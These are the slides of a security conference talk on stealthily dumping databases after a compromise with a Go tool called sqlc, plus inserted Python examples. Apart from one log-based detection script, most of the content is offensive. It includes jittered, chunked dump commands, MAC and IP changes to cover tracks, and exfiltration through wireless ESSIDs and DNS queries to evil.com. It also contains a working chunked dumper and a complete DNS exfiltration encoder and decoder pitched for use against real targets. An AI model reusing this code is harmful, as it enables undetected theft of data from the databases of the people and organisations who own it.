Art of Dumping Databases

Dumping with style

Vlatko Kosturjak (@k0st), BalCCon Novi Sad, 16th of September

Agenda

  • Introduction
  • Sysadmin perspective
  • Attacker perspective
  • Data dumping
  • Data exfiltration
  • Tools of trade
  • Summary
  • Questions and answers

45 minutes

Kost: About me

  • Security Consultant in Diverto
    • offensive/penetration tester
    • red teaming
  • Security testing
    • software/systems/mobile/infrastructure
    • embedded/IoT/ICS/SCADA
  • Linux and FLOSS enthusiast
  • Open source developer

Customer experience

  • even if you are compromised as
    • domain admin
    • root
    • DBA
  • a dump would be seen!
  • we have monitoring
    • we have logs
    • we have sensors and alerts
    • we have monitoring

Dumping database: sysadmin

  • data consistency
  • maintenance window
  • scaling
  • purpose
    • backup
    • migration
    • sync
    • ...

Standard database dumping

    mysqldump -u user -p database > dump.sql

    pg_dump -d database > dump.sql

Dumping database: sysadmin standard

  • noisy
  • data consistency
  • table locking
  • visible on monitoring
    • massive database activity
    • massive IO activity
    • massive network activity
    • ...
  • very fast

Dumping database: sysadmin protection

  • database options
    • performance impact
    • log slow queries (MySQL long_query_time, PostgreSQL log_min_duration_statement)
    • ...
  • admin/user experience
    • database performance
    • slower responses
  • database firewall
    • detecting dumps (e.g. more than 100 rows returned by a single query)
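A per-query threshold such as the 100-row rule above is only half of a detection: a dump split into small chunks never trips it, so the same check also has to run over a time window per user and table. Below is an added example (not from the talk and not part of sqlc) that does both over MySQL slow query log entries, assuming long_query_time is set to 0 so that every statement is logged together with its Rows_sent count. It is written in Python so that it runs with the standard library only; the log lines are constructed, and the thresholds PER_QUERY_ROWS, WINDOW and WINDOW_ROWS are assumptions for the demo.

```python
"""Spot bulk and chunked reads in a MySQL slow query log (added example).

With long_query_time = 0 every statement lands in the slow log together
with its Rows_sent count, which is the signal both a per-query row
threshold and a sliding-window threshold need. The log lines below are
constructed; the thresholds are assumptions for the demo.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

PER_QUERY_ROWS = 100            # one statement returning more rows than this
WINDOW = timedelta(minutes=10)  # sliding window for the chunked-dump check
WINDOW_ROWS = 500               # rows one user may read from one table per window

# MySQL 5.7/8 slow log entry: Time, User@Host, Query_time line, optional SET
# timestamp, then the statement on one line.
ENTRY_RE = re.compile(
    r"# Time: (?P<time>\S+)\n"
    r"# User@Host: (?P<user>\w+)\[\w*\] @ (?P<host>\S*) \[[^\]]*\][^\n]*\n"
    r"# Query_time: \S+\s+Lock_time: \S+\s+Rows_sent: (?P<rows>\d+)\s+Rows_examined: \d+\n"
    r"(?:SET timestamp=\d+;\n)?"
    r"(?P<sql>[^\n]+)"
)
TABLE_RE = re.compile(r"\bFROM\s+`?(\w+)`?", re.IGNORECASE)


def parse_slow_log(text):
    """Return one dict per slow-log entry."""
    events = []
    for m in ENTRY_RE.finditer(text):
        t = TABLE_RE.search(m["sql"])
        events.append({
            "time": datetime.fromisoformat(m["time"].replace("Z", "+00:00")),
            "user": m["user"],
            "rows": int(m["rows"]),
            "sql": m["sql"].strip(),
            "table": t.group(1).lower() if t else "?",
        })
    return events


def detect(events):
    """Return alerts as (kind, user, table, rows) tuples."""
    alerts, alerted = [], set()
    recent = defaultdict(list)  # (user, table) -> [(time, rows_sent), ...]
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["user"], ev["table"])
        if ev["rows"] > PER_QUERY_ROWS:           # classic mysqldump-style read
            alerts.append(("bulk", *key, ev["rows"]))
        window = recent[key]
        window.append((ev["time"], ev["rows"]))
        while ev["time"] - window[0][0] > WINDOW:  # expire old entries
            window.pop(0)
        total = sum(r for _, r in window)
        if len(window) > 1 and total > WINDOW_ROWS and key not in alerted:
            alerted.add(key)                       # many small reads add up
            alerts.append(("chunked", *key, total))
    return alerts


def make_sample_log():
    """Constructed sample: 60 reads of 10 rows, 5 s apart, from 'app'
    (a chunked dump), then one 1500-row SELECT from 'backup'."""
    def entry(t, user, rows_sent, sql):
        return (f"# Time: {t.strftime('%Y-%m-%dT%H:%M:%S')}.000000Z\n"
                f"# User@Host: {user}[{user}] @ localhost []  Id:    12\n"
                f"# Query_time: 0.000123  Lock_time: 0.000010 Rows_sent: {rows_sent}  Rows_examined: {rows_sent}\n"
                f"SET timestamp={int(t.timestamp())};\n"
                f"{sql}\n")
    t0 = datetime(2023, 9, 16, 10, 0, 0)
    log = [entry(t0 + timedelta(seconds=5 * i), "app", 10,
                 f"SELECT * FROM users LIMIT 10 OFFSET {10 * i};") for i in range(60)]
    log.append(entry(t0 + timedelta(minutes=30), "backup", 1500, "SELECT * FROM users;"))
    return "".join(log)


if __name__ == "__main__":
    for alert in detect(parse_slow_log(make_sample_log())):
        print(alert)
```

Run as-is it reports the chunked read by app once the window total passes 500 rows and the bulk read by backup. In a real deployment feed it a tail of the slow log and expect the per-window threshold to need tuning per application: an ORM paging through a list looks exactly like a slow chunked dump, which is why the per-user, per-table key matters more than the number itself.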

Dumping database: attacker perspective

  • post exploitation part
  • attacker already performed
    • recon
    • vulnerability identification
    • vulnerability exploitation
    • lateral movement
  • attacker obtained DB credentials

Dumping database: attacker perspective

  • data consistency not so important
  • slower speed
  • stealthy
    • divide by chunks
    • delay random time (jitter)
    • exfiltration options
    • extendable

Standard way

  • statically compile clients
  • write script for each engagement
  • does not scale
  • toolkit/dependency problems
  • waste of time
  • Advantages
    • written specifically for project

Go

  • Why Go?
    • Vyrus' talk from the previous BalCCon
  • Language features
    • SQL drivers for most databases
  • Advantages
    • multi platform
    • statically linked binary
    • single binary
    • frequent changes to the core

Go

  • Multiplatform
    • Windows
    • Linux
    • Mac OS X
  • Database drivers
    • Sqlite
    • Postgres
    • MySQL
    • MS SQL
    • Oracle*
    • ...

sqlc comes to life

Basic usage

    $ sqlc list
    mssql
    mysql
    postgres
    sqlite3
    sqlserver

    sqlc -d sqlite3 console

    sqlc -d mysql dump > dump.sql

Basic stealth usage

    Limit the number of rows returned per query:

    sqlc --limit-rows 3 console

    Limit rows and wait a fixed number of seconds between queries:

    sqlc --limit-rows 10 --delay-between 5s console

Stealth usage - jitter

    Limit the number of rows returned per query, with jitter:

    sqlc --min-rows 3 --max-rows 10 console

    Limit rows and wait a random number of seconds between queries (jitter on both):

    sqlc --min-delay 10s --max-delay 60s --min-rows 3 --max-rows 10 console
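The attacker-side bullets earlier (divide by chunks, random delay, speed and consistency not important) and the --min-rows/--max-rows/--min-delay/--max-delay options above are one technique. The following added example (Python, not sqlc's own code) shows it end to end against an SQLite table from the standard library: random chunk size, random pause between chunks, INSERT statements as output. It goes one step beyond LIMIT/OFFSET paging by keying each chunk on the last rowid seen (keyset pagination), so no row is fetched twice even if the table changes under the dump. The sample table, the dump_table function and its parameter names are assumptions for the demo.

```python
"""Chunked, jittered table dump against a live connection (added example).

Reads a table in random-sized chunks with a random pause between queries,
the pattern behind --min-rows/--max-rows and --min-delay/--max-delay.
Chunks are fetched by keyset on rowid rather than OFFSET so no row is read
twice even if the table grows during the dump. Uses SQLite from the
standard library; the sample table is constructed for the demo.
"""
import random
import sqlite3
import time


def sql_literal(value):
    """Render a Python value as a SQL literal for the generated INSERTs."""
    if value is None:
        return "NULL"
    if isinstance(value, bool):
        return "1" if value else "0"
    if isinstance(value, (int, float)):
        return str(value)
    if isinstance(value, bytes):
        return "X'" + value.hex() + "'"
    return "'" + str(value).replace("'", "''") + "'"


def dump_table(conn, table, min_rows=3, max_rows=10,
               min_delay=0.0, max_delay=0.0, seed=None, sleep=time.sleep):
    """Return (insert_statements, queries_issued) for `table`.

    min_rows/max_rows bound the LIMIT of each chunk, min_delay/max_delay
    (seconds) bound the jittered pause between chunks; seed makes a run
    reproducible and sleep can be swapped out in tests.
    """
    rng = random.Random(seed)
    inserts, queries = [], []
    last_rowid = 0
    select = f'SELECT rowid, * FROM "{table}" WHERE rowid > ? ORDER BY rowid LIMIT ?'
    while True:
        limit = rng.randint(min_rows, max_rows)          # random chunk size
        cur = conn.execute(select, (last_rowid, limit))
        columns = [d[0] for d in cur.description][1:]    # drop the rowid column
        rows = cur.fetchall()
        queries.append((last_rowid, limit, len(rows)))   # (after, LIMIT, fetched)
        if not rows:
            break
        for row in rows:
            last_rowid = row[0]
            values = ", ".join(sql_literal(v) for v in row[1:])
            inserts.append(f'INSERT INTO "{table}" ({", ".join(columns)}) VALUES ({values});')
        if len(rows) < limit:                            # short chunk: table exhausted
            break
        sleep(rng.uniform(min_delay, max_delay))         # jitter between chunks
    return inserts, queries


def make_sample_db():
    """Constructed sample: an in-memory SQLite database with 25 users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(i, f"user{i}", f"user{i}@example.com") for i in range(1, 26)])
    conn.commit()
    return conn


if __name__ == "__main__":
    inserts, queries = dump_table(make_sample_db(), "users",
                                  min_rows=3, max_rows=10,
                                  min_delay=0.5, max_delay=2.0, seed=1)
    print("\n".join(inserts))
    print(f"-- {len(inserts)} rows in {len(queries)} queries: {queries}")
```

Against a real target the same loop runs over a MySQL or PostgreSQL connection with the primary key in place of rowid; the queries list is what the database side sees, which is exactly the pattern a per-window detection has to add up.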
    

Covering the tracks

    sqlc -e 'ifconfig eth0 192.168.1.1'

    sqlc -E 'ifconfig eth0 hw ether CE:CA:60:6A:CE:CA; ifconfig eth0 192.168.1.1' ....

Exfiltrating data via wireless

    sqlc -e 'iwconfig eth0 essid sqlc_{B64DATA}; sleep 15' ...

    Caveat: an ESSID is at most 32 bytes, so after the sqlc_ prefix each beacon carries about 20 bytes of raw data.

Exfiltrating data via DNS

    sqlc -e 'host {B64DATA}.evil.com' ...

    On evil.com (receiver side):

    tcpdump -s 0 -vvv -i eth0 port 53
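Putting base64 straight into a label, as above, works for a quick demo but not in general: '+', '/' and '=' are not hostname characters, DNS is case-insensitive (and some resolvers randomize case), a label is at most 63 characters and a name at most 253, and resolvers retry and reorder queries. The added example below (Python, not from the talk or from sqlc) frames the data so that the receiver, fed the query names pulled from the tcpdump above or from the authoritative server's log, can reassemble it: base32 encoding, sequence-numbered chunks, an end marker, and handling of duplicated and missing chunks. The zone evil.com comes from the slide; the chunk size, label layout, function names and sample payload are assumptions.

```python
"""DNS exfiltration framing, sender and receiver side (added example).

Sender: split the data into numbered chunks, base32-encode them (base64's
'+', '/' and '=' are not label characters and DNS folds case, which base32
survives), cut the encoding into labels of at most 63 characters and keep
each name under 253 characters. Receiver: take the query names observed at
the authoritative server, reorder by sequence number, ignore duplicates
from resolver retries and report missing chunks. Zone, chunk size and the
sample payload are constructed for the demo.
"""
import base64

MAX_LABEL = 63     # RFC 1035 label limit
MAX_NAME = 253     # textual FQDN limit
SEQ_DIGITS = 4
CHUNK_BYTES = 75   # multiple of 5 -> 120 base32 chars, no padding, 2 labels

# Constructed payload: a small CSV export.
SAMPLE = b"id,name,email\n" + b"".join(
    f"{i},user{i},user{i}@example.com\n".encode() for i in range(1, 21))


def encode_queries(data, zone):
    """Return the query names to resolve, in order, ending with an 'end' marker."""
    names = []
    for seq, offset in enumerate(range(0, len(data), CHUNK_BYTES)):
        chunk = data[offset:offset + CHUNK_BYTES]
        b32 = base64.b32encode(chunk).decode().rstrip("=").lower()
        labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join([f"{seq:0{SEQ_DIGITS}d}", *labels, zone])
        if len(name) > MAX_NAME:
            raise ValueError("zone too long for CHUNK_BYTES")
        names.append(name)
    # The marker carries the chunk count so the receiver can report gaps.
    names.append(".".join([f"{len(names):0{SEQ_DIGITS}d}", "end", zone]))
    return names


def decode_queries(names, zone):
    """Rebuild the payload from observed query names; returns (data, missing_seqs)."""
    suffix = "." + zone.lower()
    chunks, total = {}, None
    for name in names:
        name = name.lower().rstrip(".")      # tcpdump prints a trailing dot
        if not name.endswith(suffix):        # unrelated query for the zone
            continue
        labels = name[:-len(suffix)].split(".")
        if not labels[0].isdigit():
            continue
        seq = int(labels[0])
        if labels[1:] == ["end"]:
            total = seq
            continue
        b32 = "".join(labels[1:])
        # Re-pad what the sender stripped; casefold tolerates 0x20 case games.
        chunks[seq] = base64.b32decode(b32 + "=" * (-len(b32) % 8), casefold=True)
    expected = total if total is not None else (max(chunks) + 1 if chunks else 0)
    missing = [i for i in range(expected) if i not in chunks]
    data = b"".join(chunks[i] for i in range(expected) if i in chunks)
    return data, missing


if __name__ == "__main__":
    queries = encode_queries(SAMPLE, "evil.com")
    for q in queries:
        print(q)                     # each is what `host <name>` would resolve
    data, missing = decode_queries(queries, "evil.com")
    print(data == SAMPLE, missing)
```

On the receiving side, extracting the names from the tcpdump output or from the authoritative server's query log and passing them to decode_queries is all that is needed; retransmitted queries overwrite an identical chunk, and the missing list tells the sender which sequence numbers to resend.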
    

Powershell

  • Invoke-DBDump ?
    • not so portable / multiplatform
  • In-memory?
    • don't touch the disk
    • other ways to execute an exe from memory
  • Database drivers
    • missing or poor PowerShell implementations
  • Looking forward to your implementation!

Sqlmap? Sqlninja?

  • Vulnerability in application
    • SQL injection
  • Some of them have direct connection support
    • dependency problem
  • sqlc
    • You need direct database connectivity
    • Not for exploiting SQL injection
    • Silent/stealthy dumping

Future

  • Evil client side
    • DNS tunneling
    • Wifi exfiltration
    • ...
  • More databases
    • Oracle?
    • DB2?
  • flexible queries
  • stacked queries
  • nosql?

Summary

  • Writing scripts for each engagement
    • Does not scale
    • Dependency problems
  • You need direct database connectivity
  • sqlc
    • Single executable client for multiple platforms
    • Silent/stealthy dumping

Tool/links

Credits/Thanks to

  • Vyrus
    • Go lang addiction
  • organizers
    • thanks for having me
  • You - thanks for listening!

Thanks for listening

?

@k0st